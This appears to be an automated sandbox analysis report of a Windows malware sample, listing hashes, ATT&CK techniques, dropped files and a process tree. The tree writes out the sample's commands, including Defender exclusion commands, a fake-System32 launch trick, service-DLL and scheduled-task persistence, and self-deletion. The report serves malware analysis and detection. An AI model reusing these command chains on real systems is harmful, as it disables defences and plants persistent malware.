b76ecfa778793bdf379a63b55d60b4b3941e10b743e48ae3b414b3522212abdb

Analysis

max time kernel
149s
max time network
151s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
21-12-2024 03:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b76ecfa778793bdf379a63b55d60b4b3941e10b743e48ae3b414b3522212abdb.exe
Size

14.0MB
MD5

228c09c31156d45dfe94195bb34d1399
SHA1

20c6ce4757be1399032b2ac6873dc505c1d02839
SHA256

b76ecfa778793bdf379a63b55d60b4b3941e10b743e48ae3b414b3522212abdb
SHA512

003557ad24f826143a50cce81b56489c7768951ecdfef9b01fe645f5453ae8cf36bd1b2b6e5e3bd8d27131cf3a2d54d20b7c699ae582e2528b65aee8a560f40c
SSDEEP

393216:hPsdXtBcda7nzo7Vd7Qv1CPwDvt3uFRCyGTQP76NuudqfZnXSdEVB3:hITk1

Score

8^/10

execution persistence

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2676	powershell.exe
1660	powershell.exe
1464	powershell.exe
2192	powershell.exe
1612	powershell.exe
2364	powershell.exe
2316	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\x367546\Parameters\ServiceDll = "C:\\Windows\\System32\\x367546.dat"	reg.exe

Deletes itself 1 IoCs

pid	Process
2648	cmd.exe

Executes dropped EXE 2 IoCs

pid	Process
2492	printui.exe
620	console_zero.exe

Loads dropped DLL 14 IoCs

pid	Process
2644	cmd.exe
2492	printui.exe
324	svchost.exe
324	svchost.exe
324	svchost.exe
1752	cmd.exe
324	svchost.exe
324	svchost.exe
324	svchost.exe
324	svchost.exe
324	svchost.exe
324	svchost.exe
620	console_zero.exe
620	console_zero.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

flow	ioc
49	raw.githubusercontent.com
52	raw.githubusercontent.com
54	raw.githubusercontent.com
59	raw.githubusercontent.com
66	raw.githubusercontent.com
67	raw.githubusercontent.com
48	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ipinfo.io
5	ipinfo.io

Drops file in System32 directory 20 IoCs

description	ioc	Process
File created	C:\Windows\System32\libiconv-2.dll	printui.exe
File created	C:\Windows\System32\libssl-3-x64.dll	printui.exe
File created	C:\Windows\System32\libwinpthread-1.dll	printui.exe
File created	C:\Windows\System32\libpq.dll	printui.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\System32\x367546.dat	printui.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\System32\winsvcf\winlogsvc	printui.exe
File created	C:\Windows\System32\libcrypto-3-x64.dll	printui.exe
File created	C:\Windows\System32\ucrtbased.dll	printui.exe
File opened for modification	\??\c:\windows\system32\winsvcf\winlogsvc	svchost.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	\??\c:\windows\system32\winsvcf\x167069.dat	svchost.exe
File created	C:\Windows\System32\libcurl.dll	printui.exe
File created	C:\Windows\System32\zlib1.dll	printui.exe
File created	C:\Windows\System32\libintl-9.dll	printui.exe
File created	C:\Windows\System32\console_zero.exe	printui.exe
File created	C:\Windows\System32\vcruntime140d.dll	printui.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1636	sc.exe
1988	sc.exe

Embeds OpenSSL 2 IoCs

Embeds OpenSSL, may be used to circumvent TLS interception.

resource	yara_rule
behavioral1/files/0x0006000000019334-24.dat	embeds_openssl
behavioral1/files/0x0005000000019613-58.dat	embeds_openssl

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
1792	timeout.exe
1720	timeout.exe
1896	timeout.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c092beaa5453db01	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1400	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2920	schtasks.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2364	powershell.exe
2316	powershell.exe
2232	b76ecfa778793bdf379a63b55d60b4b3941e10b743e48ae3b414b3522212abdb.exe
2676	powershell.exe
1660	powershell.exe
1464	powershell.exe
2192	powershell.exe
1612	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	2364	powershell.exe
Token: SeDebugPrivilege	2316	powershell.exe
Token: SeDebugPrivilege	2676	powershell.exe
Token: SeDebugPrivilege	1660	powershell.exe
Token: SeDebugPrivilege	1464	powershell.exe
Token: SeDebugPrivilege	2192	powershell.exe
Token: SeDebugPrivilege	1612	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2232 wrote to memory of 1552	2232	b76ecfa778793bdf379a63b55d60b4b3941e10b743e48ae3b414b3522212abdb.exe	31
PID 2232 wrote to memory of 1552	2232	b76ecfa778793bdf379a63b55d60b4b3941e10b743e48ae3b414b3522212abdb.exe	31
PID 2232 wrote to memory of 1552	2232	b76ecfa778793bdf379a63b55d60b4b3941e10b743e48ae3b414b3522212abdb.exe	31
PID 1552 wrote to memory of 2364	1552	cmd.exe	33
PID 1552 wrote to memory of 2364	1552	cmd.exe	33
PID 1552 wrote to memory of 2364	1552	cmd.exe	33
PID 2232 wrote to memory of 1000	2232	b76ecfa778793bdf379a63b55d60b4b3941e10b743e48ae3b414b3522212abdb.exe	34
PID 2232 wrote to memory of 1000	2232	b76ecfa778793bdf379a63b55d60b4b3941e10b743e48ae3b414b3522212abdb.exe	34
PID 2232 wrote to memory of 1000	2232	b76ecfa778793bdf379a63b55d60b4b3941e10b743e48ae3b414b3522212abdb.exe	34
PID 1000 wrote to memory of 2316	1000	cmd.exe	36
PID 1000 wrote to memory of 2316	1000	cmd.exe	36
PID 1000 wrote to memory of 2316	1000	cmd.exe	36
PID 2232 wrote to memory of 2700	2232	b76ecfa778793bdf379a63b55d60b4b3941e10b743e48ae3b414b3522212abdb.exe	37
PID 2232 wrote to memory of 2700	2232	b76ecfa778793bdf379a63b55d60b4b3941e10b743e48ae3b414b3522212abdb.exe	37
PID 2232 wrote to memory of 2700	2232	b76ecfa778793bdf379a63b55d60b4b3941e10b743e48ae3b414b3522212abdb.exe	37
PID 2232 wrote to memory of 2644	2232	b76ecfa778793bdf379a63b55d60b4b3941e10b743e48ae3b414b3522212abdb.exe	39
PID 2232 wrote to memory of 2644	2232	b76ecfa778793bdf379a63b55d60b4b3941e10b743e48ae3b414b3522212abdb.exe	39
PID 2232 wrote to memory of 2644	2232	b76ecfa778793bdf379a63b55d60b4b3941e10b743e48ae3b414b3522212abdb.exe	39
PID 2644 wrote to memory of 2492	2644	cmd.exe	41
PID 2644 wrote to memory of 2492	2644	cmd.exe	41
PID 2644 wrote to memory of 2492	2644	cmd.exe	41
PID 2232 wrote to memory of 2648	2232	b76ecfa778793bdf379a63b55d60b4b3941e10b743e48ae3b414b3522212abdb.exe	42
PID 2232 wrote to memory of 2648	2232	b76ecfa778793bdf379a63b55d60b4b3941e10b743e48ae3b414b3522212abdb.exe	42
PID 2232 wrote to memory of 2648	2232	b76ecfa778793bdf379a63b55d60b4b3941e10b743e48ae3b414b3522212abdb.exe	42
PID 2492 wrote to memory of 2820	2492	printui.exe	44
PID 2492 wrote to memory of 2820	2492	printui.exe	44
PID 2492 wrote to memory of 2820	2492	printui.exe	44
PID 2648 wrote to memory of 1792	2648	cmd.exe	46
PID 2648 wrote to memory of 1792	2648	cmd.exe	46
PID 2648 wrote to memory of 1792	2648	cmd.exe	46
PID 2820 wrote to memory of 2676	2820	cmd.exe	47
PID 2820 wrote to memory of 2676	2820	cmd.exe	47
PID 2820 wrote to memory of 2676	2820	cmd.exe	47
PID 2492 wrote to memory of 1208	2492	printui.exe	48
PID 2492 wrote to memory of 1208	2492	printui.exe	48
PID 2492 wrote to memory of 1208	2492	printui.exe	48
PID 1208 wrote to memory of 1636	1208	cmd.exe	50
PID 1208 wrote to memory of 1636	1208	cmd.exe	50
PID 1208 wrote to memory of 1636	1208	cmd.exe	50
PID 1208 wrote to memory of 1400	1208	cmd.exe	51
PID 1208 wrote to memory of 1400	1208	cmd.exe	51
PID 1208 wrote to memory of 1400	1208	cmd.exe	51
PID 1208 wrote to memory of 1988	1208	cmd.exe	52
PID 1208 wrote to memory of 1988	1208	cmd.exe	52
PID 1208 wrote to memory of 1988	1208	cmd.exe	52
PID 2492 wrote to memory of 1752	2492	printui.exe	54
PID 2492 wrote to memory of 1752	2492	printui.exe	54
PID 2492 wrote to memory of 1752	2492	printui.exe	54
PID 1752 wrote to memory of 620	1752	cmd.exe	56
PID 1752 wrote to memory of 620	1752	cmd.exe	56
PID 1752 wrote to memory of 620	1752	cmd.exe	56
PID 2492 wrote to memory of 2264	2492	printui.exe	57
PID 2492 wrote to memory of 2264	2492	printui.exe	57
PID 2492 wrote to memory of 2264	2492	printui.exe	57
PID 2492 wrote to memory of 1748	2492	printui.exe	58
PID 2492 wrote to memory of 1748	2492	printui.exe	58
PID 2492 wrote to memory of 1748	2492	printui.exe	58
PID 1748 wrote to memory of 1720	1748	cmd.exe	61
PID 1748 wrote to memory of 1720	1748	cmd.exe	61
PID 1748 wrote to memory of 1720	1748	cmd.exe	61
PID 2264 wrote to memory of 1896	2264	cmd.exe	62
PID 2264 wrote to memory of 1896	2264	cmd.exe	62
PID 2264 wrote to memory of 1896	2264	cmd.exe	62
PID 620 wrote to memory of 1532	620	console_zero.exe	63

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\b76ecfa778793bdf379a63b55d60b4b3941e10b743e48ae3b414b3522212abdb.exe
"C:\Users\Admin\AppData\Local\Temp\b76ecfa778793bdf379a63b55d60b4b3941e10b743e48ae3b414b3522212abdb.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2232
- C:\Windows\system32\cmd.exe
  cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1552
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2364
- C:\Windows\system32\cmd.exe
  cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1000
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2316
- C:\Windows\system32\cmd.exe
  cmd.exe /c mkdir "\\?\C:\Windows \System32"
  2⤵
  PID:2700
- C:\Windows\system32\cmd.exe
  cmd.exe /c start "" "C:\Windows \System32\printui.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2644
- - C:\Windows \System32\printui.exe
    "C:\Windows \System32\printui.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Suspicious use of WriteProcessMemory
    PID:2492
  - - C:\Windows\system32\cmd.exe
      cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2820
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2676
  - - C:\Windows\system32\cmd.exe
      cmd.exe /c sc create x367546 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x367546\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x367546.dat" /f && sc start x367546
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1208
    - - C:\Windows\System32\sc.exe
        
        sc create x367546 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
        5⤵
        Launches sc.exe
        
        PID:1636
    - - C:\Windows\System32\reg.exe
        
        reg add HKLM\SYSTEM\CurrentControlSet\services\x367546\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x367546.dat" /f
        5⤵
        Server Software Component: Terminal Services DLL
        Modifies registry key
        
        PID:1400
    - - C:\Windows\System32\sc.exe
        
        sc start x367546
        5⤵
        Launches sc.exe
        
        PID:1988
  - - C:\Windows\system32\cmd.exe
      cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1752
    - - C:\Windows\System32\console_zero.exe
        
        "C:\Windows\System32\console_zero.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:620
      - C:\Windows\System32\cmd.exe
        
        cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
        6⤵
        
        PID:1532
        
        C:\Windows\System32\schtasks.exe
        
        schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2920
  - - C:\Windows\system32\cmd.exe
      cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2264
    - - C:\Windows\System32\timeout.exe
        
        timeout /t 14 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:1896
  - - C:\Windows\system32\cmd.exe
      cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows \System32\printui.dll"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1748
    - - C:\Windows\System32\timeout.exe
        
        timeout /t 16 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:1720
- C:\Windows\system32\cmd.exe
  cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\Admin\AppData\Local\Temp\b76ecfa778793bdf379a63b55d60b4b3941e10b743e48ae3b414b3522212abdb.exe"
  2⤵
  - Deletes itself
  - Suspicious use of WriteProcessMemory
  PID:2648
- - C:\Windows\system32\timeout.exe
    timeout /t 10 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:1792

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k DcomLaunch
1⤵
- Loads dropped DLL
- Drops file in System32 directory
PID:324
- C:\Windows\System32\cmd.exe
  cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
  2⤵
  PID:3032
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1660
- C:\Windows\System32\cmd.exe
  cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
  2⤵
  PID:1708
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1464
- C:\Windows\System32\cmd.exe
  cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'G:\'
  2⤵
  PID:492
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath 'G:\'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2192
- C:\Windows\System32\cmd.exe
  cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'H:\'
  2⤵
  PID:2144
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath 'H:\'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1612

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
a6c46e4248150cc4bc604ca5c7c8816d

SHA1
d0149985f9b8715e1aee944cc18ce86f58386741

SHA256
e11bf6bfeeee1c3a5208a25a2d3a0095a19da64f251be8a45cca6396fad73fd6

SHA512
2e53aea158c43e6a385c82eea40c73fd66692e77b2d8b79ad9dc4bd22e76bbcb17e435e59a5acbb1bcb3263596296af51afc84b736ac76e1718383abd883d22d

Download Submit
C:\Windows \System32\printui.dll

Filesize
13.5MB

MD5
d208410bae05cfa96a7c83c4ce614dd1

SHA1
2b120f3bd686cb5e7e29d338afab78dd9970c70c

SHA256
dc42b209da59c321377f42575f4a43e38036a6482556436b2774cfd08e402668

SHA512
949651249c8a40223dda7bb3183f620b7949cf0afd54cc57f34163595aaba03594e5bac06237d4367d025c3d05c6bc28fc81d4916eba04d8bcb35bf6031ff235

Download Submit
\??\c:\windows\system32\LIBPQ.dll

Filesize
311KB

MD5
7eee6a30591a00c01f78007e954b502c

SHA1
360ff971de182db92ac8c785a6558b8510ee954c

SHA256
a25db94ff6564067ad5a54dcbdbb4feebae24a58fab0b7f9262f89dd00d5dc63

SHA512
b09fc93167654494731236b641771df373cf57843850eeb56047baecd24363205392293e34823e8aea66ba0e63df41fba0f8f003b067083e541f7056bfe8f385

Download Submit
\??\c:\windows\system32\libcrypto-3-x64.dll

Filesize
4.5MB

MD5
158f0e7c4529e3867e07545c6d1174a9

SHA1
9ff0cccb271f0215ad24427b7254832549565154

SHA256
dcc1fa1a341597ddb1476e3b5b3952456f07870a26fc30b0c6e6312764baa1fc

SHA512
51e79d8d0ab183046f87aa659973b45147bb1e1ae8883f688c615ccb18bf9fccb8779dd872b01748bacd56e141bc096c2bb4ccf32ebd7a49adc76363355e40fe

Download Submit
\??\c:\windows\system32\libcurl.dll

Filesize
575KB

MD5
18ce47f58b4c1a9cfc1edf7c8bf49b7c

SHA1
e74d08ab06ed8200d7e674d8031d6df8250de8cb

SHA256
36d97f1c254832cee9698cea2f1a63ea98d231641fd29715ef581be103ace602

SHA512
19b2d6968095c4e8f08c66ab73e7ec5e0439712bcb2777266602ef2ad123a779395a3d44bc0c7c9945376998fb2165bc60e6bf682863a55a0cff40c720594bdd

Download Submit
\??\c:\windows\system32\libiconv-2.dll

Filesize
1.8MB

MD5
158bc77453d382cf6679ce35df740cc5

SHA1
9a3c123ce4b6f6592ed50d6614387d059bfb842f

SHA256
cf131738f4b5fe3f42e9108e24595fc3e6573347d78e4e69ec42106c1eebe42c

SHA512
6eb1455537cb4e62e9432032372fae9ce824a48346e00baf38ef2f840e0ed3f55acaee2656da656db00ae0bdef808f8da291dd10d7453815152eda0ccfc73147

Download Submit
\??\c:\windows\system32\libintl-9.dll

Filesize
464KB

MD5
e79e7c9d547ddbee5c8c1796bd092326

SHA1
8e50b296f4630f6173fc77d07eea36433e62178a

SHA256
1125ac8dc0c4f5c3ed4712e0d8ad29474099fcb55bb0e563a352ce9d03ef1d78

SHA512
dba65731b7ada0ac90b4122c7b633cd8d9a54b92b2241170c6f09828554a0bc1b0f3edf6289b6141d3441ab11af90d6f8210a73f01964276d050e57fb94248e2

Download Submit
\??\c:\windows\system32\libssl-3-x64.dll

Filesize
799KB

MD5
69d0fee0cc47c3b255c317f08ce8d274

SHA1
782bc8f64b47a9dcedc95895154dca60346f5dd7

SHA256
ba979c2dbfb35d205d9d28d97d177f33d501d954c7187330f6893bb7d0858713

SHA512
4955252c7220810ed2eaca002e57d25fbc17862f4878983c4351c917cf7873eb84ae00e5651583004f15a08789be64bdb34ff20cb0e172c9c1376706deb4aa1a

Download Submit
\??\c:\windows\system32\libwinpthread-1.dll

Filesize
51KB

MD5
9dc829c2c8962347bc9adf891c51ac05

SHA1
bf9251a7165bb2981e613ac5d9051f19edb68463

SHA256
ffe2d56375bb4e8bdee9037df6befc5016ddd8871d0d85027314dd5792f8fdc9

SHA512
fd7e6f50a21cb59075dfa08c5e6275fd20723b01a23c3e24fb369f2d95a379b5ac6ae9f509aa42861d9c5114be47cce9ff886f0a03758bfdc3a2a9c4d75fab56

Download Submit
\??\c:\windows\system32\winsvcf\winlogsvc

Filesize
400B

MD5
69a917e87181c8ae22d12bc473804047

SHA1
2669775daa5d3001f9d39053bfe8843a2845da11

SHA256
f0552385109708dc77e1bfb3b27c684313396282211aaec01cc742e4f98184db

SHA512
e0d31e53f7821a60d0d264ed436239eabc995315f5d20cdae6a7f9dc16e5e1857d284679b3208e2be748ddf6977325e8bad75987ce2d2dc7ad87cbba883298fb

Download Submit
\??\c:\windows\system32\x367546.dat

Filesize
1.9MB

MD5
dd6b814d79b44d3a17ef1175c724f199

SHA1
4b50ad258d2d177f22ed06ce3494dea67c180b22

SHA256
ed6bf39b821cf5ecb2e73b6021913b9d6f0fc73a82ee9e9c8b64b2a0eb7e917c

SHA512
60a92d0fe216eccf001abc9d90ab21d459c1442b999d3719129c17814bf529f19edcb35469ed79691072747e0f57c4c417600b8a398bfc1131f42d324a5fded2

Download Submit
\??\c:\windows\system32\zlib1.dll

Filesize
88KB

MD5
f53d1efea4855da42da07de49d80ba68

SHA1
920349f4bd5a5b8e77195c81e261dfa2177eb1ee

SHA256
7e9f43688189578042d791e3e5301165316edc7c1ed739e0669c033a3ca08037

SHA512
5d72f64b8e5c42a3c9a7bcbbe8a1598a85402ade4f312ab9e26869f8b39952a3aa037f2cf7da89e686c5bc3fcb221feeae077b9ffd2eef98dac0e307637fe7bd

Download Submit
\Windows \System32\printui.exe

Filesize
60KB

MD5
6cb8923169ca734dbb2706b56a0ba5ef

SHA1
1de97a2c9f8271355c75dfd417ba1b2f8e362b0d

SHA256
334b66ba0dc0eed2a9f842a86d755edcce6a0fdffeb153eb6a6dd9ed0d88683c

SHA512
ed564ccb426aff1ab7b54b07d4e47b75123a52864693a677b1e58c8edb1e4127de65962c93c9b2a23e643e979932f3014f97e8a569c2bfeeadb0b6147b99620e

Download Submit
\Windows\System32\console_zero.exe

Filesize
649KB

MD5
4eccb8f5d1edcf18a11abed91ff85c46

SHA1
4cf96ef88d3d042d050cc8d963ef2141975a196a

SHA256
3286edb355b9afcb9f08ca87967001a56685d2298014c82a672ef3769e232838

SHA512
ec8b97ce4712cf94e9c9f5c0454fcbc52559ac4d7d076bf76e2e6a3052fbf18696a5f1bc602a70a06d5101e3f1bcd8b64995a2d71731e7ccb939fe67224924f9

Download Submit
memory/324-69-0x0000000064940000-0x0000000064955000-memory.dmp

Filesize
84KB

Download
memory/324-91-0x0000000068280000-0x00000000682F0000-memory.dmp

Filesize
448KB

Download
memory/324-68-0x0000000068280000-0x00000000682F0000-memory.dmp

Filesize
448KB

Download
memory/324-70-0x0000000066000000-0x00000000661BD000-memory.dmp

Filesize
1.7MB

Download
memory/2316-18-0x0000000002780000-0x0000000002788000-memory.dmp

Filesize
32KB

Download
memory/2316-17-0x000000001B550000-0x000000001B832000-memory.dmp

Filesize
2.9MB

Download
memory/2364-10-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/2364-9-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/2364-6-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/2364-8-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download
memory/2364-5-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

Filesize
2.9MB

Download
memory/2364-4-0x000007FEF5EDE000-0x000007FEF5EDF000-memory.dmp

Filesize
4KB

Download
memory/2364-7-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download
memory/2364-11-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

Filesize
9.6MB

Download